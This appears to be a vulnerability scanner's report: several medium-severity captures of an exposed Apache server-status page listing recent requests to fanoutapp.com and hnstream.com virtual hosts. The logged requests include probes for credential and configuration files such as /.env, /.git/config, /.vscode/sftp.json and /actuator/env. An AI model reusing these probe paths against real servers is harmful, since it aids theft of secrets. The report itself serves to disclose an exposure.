127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3732736700/18/577_ 0.431263798410.00.051.33 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-37327367010/23/592W 0.470074970.00.061.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3732736700/16/592_ 0.476831670020.00.051.77 167.82.237.76http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3732736700/17/594_ 0.44676777950.00.051.42 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 0-3732736700/19/577_ 0.47499179310.00.061.43 157.52.97.29http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3732736700/22/607_ 0.46494072110.00.061.48 127.0.0.1http/1.1hnstream.com:8000GET /static/require-2.1.11-min.js HTTP/1.1 0-3732736700/21/571_ 0.47487072300.00.051.50 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-3732736700/18/606_ 0.47487166130.00.051.54 127.0.0.1http/1.1hnstream.com:8000GET /static/json2.js HTTP/1.1 0-3732736700/18/594_ 0.48487180830.00.051.80 127.0.0.1http/1.1hnstream.com:8000GET /static/require-2.1.11-min.js HTTP/1.1 1-3732736710/13/409_ 0.322792369770.00.041.38 127.0.0.1http/1.1api.hnstream.com:8000GET /password.php HTTP/1.1 1-3732736710/11/401_ 0.296137072440.00.031.08 127.0.0.1http/1.1hnstream.com:8000POST /search/feedback HTTP/1.1 1-3732736710/12/398_ 0.322793347310.00.031.33 127.0.0.1http/1.1api.hnstream.com:8000GET /1.php HTTP/1.1 1-3732736710/15/409_ 0.322792441470.00.051.41 127.0.0.1http/1.1api.hnstream.com:8000GET /systembc/password.php HTTP/1.1 1-3732736710/9/422_ 0.297842465620.00.031.37 167.82.236.21http/1.1api.hnstream.com:8000GET /comments/stream//%22http://nathansuniversity.com//%22 HTTP 1-3732736710/13/414_ 0.322793351660.00.041.26 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-3732736710/11/420_ 0.31674051910.00.031.44 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/pulse HTTP/1.1 1-3732736710/14/408_ 0.322794342650.00.041.12 127.0.0.1http/1.1api.hnstream.com:8000GET /geoip/ HTTP/1.1 1-3732736710/13/413_ 0.32682144830.00.041.00 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-3732736710/15/395_ 0.296114060330.00.041.27 127.0.0.1http/1.1hnstream.com:8000POST /search/feedback HTTP/1.1 1-3732736710/11/406_ 0.322795156450.00.031.24 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-3732736710/11/409_ 0.3155065847620.00.031.12 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 1-3732736710/13/410_ 0.3170051441250.00.040.98 127.0.0.1http/1.1api.hnstream.com:8000GET /cdn-cgi/trace HTTP/1.1 1-3732736710/16/401_ 0.305501036390.00.041.32 127.0.0.1http/1.1hnstream.com:8000POST /signup HTTP/1.1 1-3732736710/11/416_ 0.312787052570.00.031.25 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/activity HTTP/1.1 1-3732736710/13/399_ 0.314036250050.00.041.07 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-3732736710/15/417_ 0.32682044970.00.041.20 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-3732736710/14/416_ 0.304031061600.00.041.32 127.0.0.1http/1.1hnstream.com:8000POST /signup HTTP/1.1 1-3732736710/14/408_ 0.32681145460.00.041.17 127.0.0.1http/1.1hnstream.com:8000GET /static/json2.js HTTP/1.1 1-3732736710/12/391_ 0.3227951450540.00.041.00 127.0.0.1http/1.1api.hnstream.com:8000GET /form.html HTTP/1.1 1-3732736710/13/407_ 0.32679047140.00.031.13 127.0.0.1http/1.1hnstream.com:8000GET /llms.txt HTTP/1.1 1-3732736710/14/408_ 0.316142648300.00.041.31 205.210.31.231http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-3732736710/9/396_ 0.297000053940.00.021.26 127.0.0.1http/1.1hnstream.com:8000POST /search/feedback HTTP/1.1 1-3732736710/15/399_ 0.322795441110.00.040.99 127.0.0.1http/1.1api.hnstream.com:8000GET /upl.php HTTP/1.1 1-3732736710/14/421_ 0.322794441510.00.041.08 127.0.0.1http/1.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf11f6db42
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Friday, 14-Feb-2025 13:57:08 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 36 Parent Server MPM Generation: 35 Server uptime: 34 days 15 hours 18 minutes 11 seconds Server load: 0.24 0.19 0.18 Total accesses: 32294 - Total Traffic: 90.1 MB - Total Duration: 472095 CPU Usage: u50.55 s84.05 cu690.04 cs259.49 - .0362% CPU load .0108 requests/sec - 31 B/second - 2925 B/request - 14.6187 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03094629no0yes124000 13094630no0yes025000 Sum200 149000 ________________________W_________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3530946290/10/547_ 0.2640922100610.00.021.18 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3530946290/7/536_ 0.28348811100190.00.091.84 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3530946290/11/541_ 0.263483773560.00.021.64 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-3530946290/7/569_ 0.283393684700.00.021.59 127.0.0.1http/1.1api.hnstream.com:8000GET /.git/refs/ HTTP/1.1 0-3530946290/9/511_ 0.263388778470.00.021.03 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 0-3530946290/5/547_ 0.282885681510.00.011.34 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3530946290/10/545_ 0.262880478360.00.011.57 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/1393e25363e2130313e2135313/_/;/META-INF/maven/com.atlass 0-3530946290/5/541_ 0.282283774030.00.011.21 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3530946290/6/540_ 0.281182076670.00.021.91 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-3530946290/10/560_ 0.262278483470.00.011.50 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-3530946290/9/524_ 0.291181175150.00.021.33 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-3530946290/11/550_ 0.281182083970.00.021.66 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-3530946290/6/524_ 0.2411761778340.00.011.20 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3530946290/8/555_ 0.29525783930.00.021.41 198.235.24.158http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3530946290/8/533_ 0.24523089450.00.021.40 198.235.24.158http/1.1 0-3530946290/8/550_ 0.292574106670.00.011.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-3530946290/9/531_ 0.291396170.00.021.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3530946290/11/545_ 0.291372010.00.101.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-3530946290/11/549_ 0.291367160.00.031.61 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-3530946290/8/548_ 0.291375040.00.091.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3530946290/9/530_ 0.291376880.00.011.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-3530946290/10/560_ 0.290369260.00.021.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3530946290/9/519_ 0.290370330.00.021.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3530946290/8/561_ 0.290364120.00.011.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-35309462910/8/539W 0.280077770.00.021.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3530946300/4/315_ 0.194694660680.00.001.05 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/4/312_ 0.1746891863610.00.010.92 167.82.237.86http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-3530946300/5/307_ 0.194683142470.00.001.08 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-3530946300/5/316_ 0.174678635320.00.011.13 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/4/335_ 0.1940911451940.00.001.05 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/3/327_ 0.173548847290.00.011.02 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/7/336_ 0.201680848140.00.011.30 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/4/316_ 0.197102638570.00.010.94 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/9/326_ 0.181072640670.00.020.84 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/6/303_ 0.171317645430.00.011.12 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/3/321_ 0.20474652550.00.011.10 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/5/316_ 0.177097742920.00.000.94 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/4/317_ 0.168375430920.00.010.79 127.0.0.1http/1.1api.hnstream.com:8000GET /logs/archived/.git/config HTTP/1.1 1-3530946300/6/305_ 0.176496831710.00.011.06 157.52.88.26http/1.1api.livecounter.org:8000GET /robots.txt HTTP/1.1 1-3530946300/4/330_ 0.1740862948750.00.011.10 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/7/311_ 0.2035532745480.00.020.83 127.0.0.1http/1.1api.hnstream.com:8000GET /cdn-cgi/trace HTTP/1.1 1-3530946300/5/328_ 0.171675941240.00.010.97 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/6/330_ 0.2010772052530.00.011.16 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/6/319_ 0.2013221541410.00.011.01 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-3530946300/9/308_ 0.194693145570.00.020.83 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-3530946300/3/322_ 0.196501943870.00.000.94 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/6/322_ 0.198380144480.00.011.06 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-3530946300/6/309_ 0.197704843740.00.011.09 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/3/300_ 0.169716336810.00.010.78 127.0.0.1http/1.1api.hnstream.com:8000GET /data/processing/.git/config HTTP/1.1 1-3530946300/3/325_ 0.167699336870.00.01
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf2763af0d
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Wednesday, 12-Feb-2025 14:08:10 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 34 Parent Server MPM Generation: 33 Server uptime: 32 days 15 hours 29 minutes 13 seconds Server load: 0.01 0.11 0.15 Total accesses: 31027 - Total Traffic: 86.8 MB - Total Duration: 456832 CPU Usage: u47.89 s79.82 cu650.83 cs244.18 - .0363% CPU load .011 requests/sec - 32 B/second - 2934 B/request - 14.7237 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02919530no0yes025000 12919531no0yes124000 Sum200 149000 ______________________________W___________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3329195300/16/529_ 0.341353696950.00.041.15 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /syn/ HTTP/1.1 0-3329195300/15/514_ 0.36281197230.00.111.66 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3329195300/14/519_ 0.34601271790.00.041.60 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /index.html HTTP/1.1 0-3329195300/14/548_ 0.35276282520.00.101.54 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /home.html HTTP/1.1 0-3329195300/14/488_ 0.351835272830.00.030.98 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /code1.html HTTP/1.1 0-3329195300/10/523_ 0.351835380430.00.021.29 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /api/version HTTP/1.1 0-3329195300/16/528_ 0.351835372730.00.031.47 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /app/ HTTP/1.1 0-3329195300/14/524_ 0.351835373300.00.031.18 127.0.0.1http/1.1chat.fanoutapp.com:8000POST /wap/forward HTTP/1.1 0-3329195300/11/515_ 0.341835374570.00.021.85 127.0.0.1http/1.1 0-3329195300/14/535_ 0.351828381340.00.041.45 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /setting/global HTTP/1.1 0-3329195300/12/500_ 0.351828372780.00.031.28 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /$web/index.html HTTP/1.1 0-3329195300/15/523_ 0.351828375390.00.031.54 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /api/index/config HTTP/1.1 0-3329195300/10/509_ 0.351827376410.00.031.10 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /css/nsc/reset.css HTTP/1.1 0-3329195300/15/530_ 0.351827282360.00.031.37 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /verification.asp HTTP/1.1 0-3329195300/13/513_ 0.351827388620.00.031.35 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /Res/font/font.css HTTP/1.1 0-3329195300/13/524_ 0.351827492300.00.031.42 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /Home/Get/getJnd28 HTTP/1.1 0-3329195300/13/509_ 0.351827388890.00.031.18 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /skin/js/common.js HTTP/1.1 0-3329195300/14/516_ 0.351827365790.00.041.68 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /img/nyyh/chkjs.js HTTP/1.1 0-3329195300/11/528_ 0.351827366240.00.031.57 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /api/Business/ HTTP/1.1 0-3329195300/15/518_ 0.351826373020.00.031.19 127.0.0.1http/1.1chat.fanoutapp.com:8000POST /biz/server/config HTTP/1.1 0-3329195300/10/512_ 0.341826375220.00.021.30 127.0.0.1http/1.1 0-3329195300/15/531_ 0.351430567400.00.111.32 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-3329195300/11/499_ 0.311425369580.00.021.36 127.0.0.1http/1.1 0-3329195300/11/539_ 0.361358463150.00.031.32 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-3329195300/13/519_ 0.36606576120.00.031.59 157.52.108.88http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3329195310/32/289_ 0.711353820.00.091.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-3329195310/34/284_ 0.711353390.00.090.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3329195310/32/284_ 0.710335740.00.091.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3329195310/34/286_ 0.710333120.00.081.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3329195310/34/308_ 0.710350270.00.091.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-33291953110/36/300W 0.670045270.00.100.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3329195310/34/311_ 0.691208746280.00.101.25 157.52.108.88http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3329195310/35/284_ 0.68820236410.00.110.89 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /index.php?m=api&c=app&a=getPlatformConfig HTTP/1.1 1-3329195310/34/286_ 0.671203038570.00.090.77 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /static/img/new-lottery-title.921682f7.png HTTP/1.1 1-3329195310/32/280_ 0.70439143950.00.081.07 127.0.0.1http/1.1hnstream.com:8000GET /static/pollymer-1.1.0.js HTTP/1.1 1-3329195310/35/291_ 0.69440050990.00.101.04 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-3329195310/34/284_ 0.69825640760.00.090.87 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-3329195310/33/298_ 0.70440130070.00.100.75 127.0.0.1http/1.1hnstream.com:8000GET /static/require-2.1.11-min.js HTTP/1.1 1-3329195310/37/280_ 0.68434330460.00.191.01 127.0.0.1http/1.1chat.fanoutapp.com:8000POST /site/api/v1/site/vipExclusiveDomain/getGuestDomain HTTP/1 1-3329195310/31/306_ 0.70439047450.00.090.99 127.0.0.1http/1.1hnstream.com:8000GET /static/main.js HTTP/1.1 1-3329195310/33/274_ 0.70440142480.00.090.76 127.0.0.1http/1.1hnstream.com:8000GET /static/json2.js HTTP/1.1 1-3329195310/37/302_ 0.70220639380.00.100.91 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-3329195310/35/294_ 0.70439048010.00.081.07 127.0.0.1http/1.1hnstream.com:8000GET /static/knockout-extensions.js HTTP/1.1 1-3329195310/27/292_ 0.70438539740.00.080.95 140.248.97.45http/1.1api.hnstream.com:8000GET /comments/items/ HTTP/1.1 1-3329195310/28/271_ 0.67433338320.00.080.75 127.0.0.1http/1.1 1-3329195310/35/300_ 0.68215242370.00.100.90 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /favicon.ico HTTP/1.1 1-3329195310/34/292_ 0.702442200.00.090.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3329195310/34/280_ 0.7022642050.00.081.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-3329195310/30/276_ 0.712334990.00.090.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-3329195310/35/299_ 0.702335130.00.090.84
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfc72ba097
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Monday, 10-Feb-2025 11:55:05 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 32 Parent Server MPM Generation: 31 Server uptime: 30 days 13 hours 16 minutes 8 seconds Server load: 0.18 0.16 0.17 Total accesses: 28470 - Total Traffic: 80.5 MB - Total Duration: 435344 CPU Usage: u44.34 s75.09 cu609.13 cs229.53 - .0363% CPU load .0108 requests/sec - 31 B/second - 2963 B/request - 15.2913 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02747872no0yes124000 22747873no1yes025010 Sum201 149010 ______W__________________.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3127478720/6/490_ 0.181495080.00.021.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-3127478720/6/477_ 0.181382790.00.021.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3127478720/5/483_ 0.181369020.00.021.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-3127478720/6/511_ 0.180380380.00.021.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3127478720/4/453_ 0.180366090.00.010.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3127478720/5/493_ 0.180378410.00.011.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-31274787210/3/488W 0.170071010.00.001.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3127478720/4/488_ 0.154366471640.00.011.12 140.248.83.26http/1.1api.hnstream.com:8000GET /comments/stream//%22http://arstechnica.com/apple/2012/01/m 0-3127478720/2/483_ 0.174274473040.00.001.80 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-3127478720/4/499_ 0.174270278950.00.011.38 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /sitemap.xml HTTP/1.1 0-3127478720/6/466_ 0.174273370720.00.011.22 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-3127478720/4/489_ 0.154265473560.00.011.48 140.248.83.78http/1.1api.hnstream.com:8000GET /comments/stream//%22http://turing.deepart.io:3838//%22 HTT 0-3127478720/5/476_ 0.172515173770.00.010.98 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3127478720/5/494_ 0.152510479430.00.011.31 140.248.83.76http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.ams.org/notices/200902/rtx0 0-3127478720/5/479_ 0.171680281440.00.011.28 195.178.110.224http/1.1api.hnstream.com:8000GET / HTTP/1.0 0-3127478720/5/491_ 0.151680490470.00.011.36 140.248.83.84http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.datascraping.co/%22 HTTP/1. 0-3127478720/6/475_ 0.171345687270.00.011.13 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3127478720/4/485_ 0.121340764030.00.011.61 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3127478720/6/494_ 0.187391064330.00.021.47 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3127478720/4/481_ 0.12734764640.00.011.10 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3127478720/6/475_ 0.18153973380.00.021.21 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3127478720/4/495_ 0.182365520.00.011.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-3127478720/4/468_ 0.12148467610.00.011.24 206.168.34.195http/1.1api.hnstream.com:8000PRI * HTTP/2.0 0-3127478720/5/508_ 0.1822760900.00.021.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-3127478720/4/482_ 0.182474150.00.011.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-25-0/0/244. 0.00474881242210.00.000.82 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/237. 0.004748813346190.00.000.68 167.82.173.44http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/236. 0.00474881033150.00.000.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.css HTTP/1.1 1-25-0/0/238. 0.004748812230670.00.000.89 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 1-25-0/0/256. 0.00474881648420.00.000.82 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/jquery-3.1.1.min.js HTTP/1.1 1-25-0/0/251. 0.004748811738770.00.000.84 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/259. 0.00474881143320.00.001.12 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/235. 0.00474881634720.00.000.68 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/236. 0.00474881636150.00.000.65 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/236. 0.00474881642540.00.000.90 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/242. 0.00474881648490.00.000.92 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/232. 0.00474881138480.00.000.74 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00474881528040.00.000.61 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/230. 0.00474881827550.00.000.79 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/259. 0.00474881639650.00.000.87 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/229. 0.00474881138810.00.000.65 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/249. 0.00474881136440.00.000.77 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-25-0/0/247. 0.00474881645950.00.000.97 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/248. 0.004748811737990.00.000.84 140.248.75.174http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/228. 0.004748811936650.00.000.64 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00474881635120.00.000.76 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/241. 0.004748811234010.00.000.85 157.52.117.82http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-25-0/0/234. 0.004748811628370.00.000.93 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/234. 0.00474881332870.00.000.62 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-25-0/0/249. 0.0047488173269
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfaeb1d4b8
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Saturday, 08-Feb-2025 14:39:36 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 30 Parent Server MPM Generation: 29 Server uptime: 28 days 16 hours 39 seconds Server load: 0.26 0.26 0.20 Total accesses: 27133 - Total Traffic: 76.5 MB - Total Duration: 421793 CPU Usage: u41.85 s70.81 cu568.74 cs214.51 - .0362% CPU load .011 requests/sec - 32 B/second - 2957 B/request - 15.5454 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02571705no0yes124000 22571706no0yes025000 Sum200 149000 ________________________W.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2925717050/18/463_ 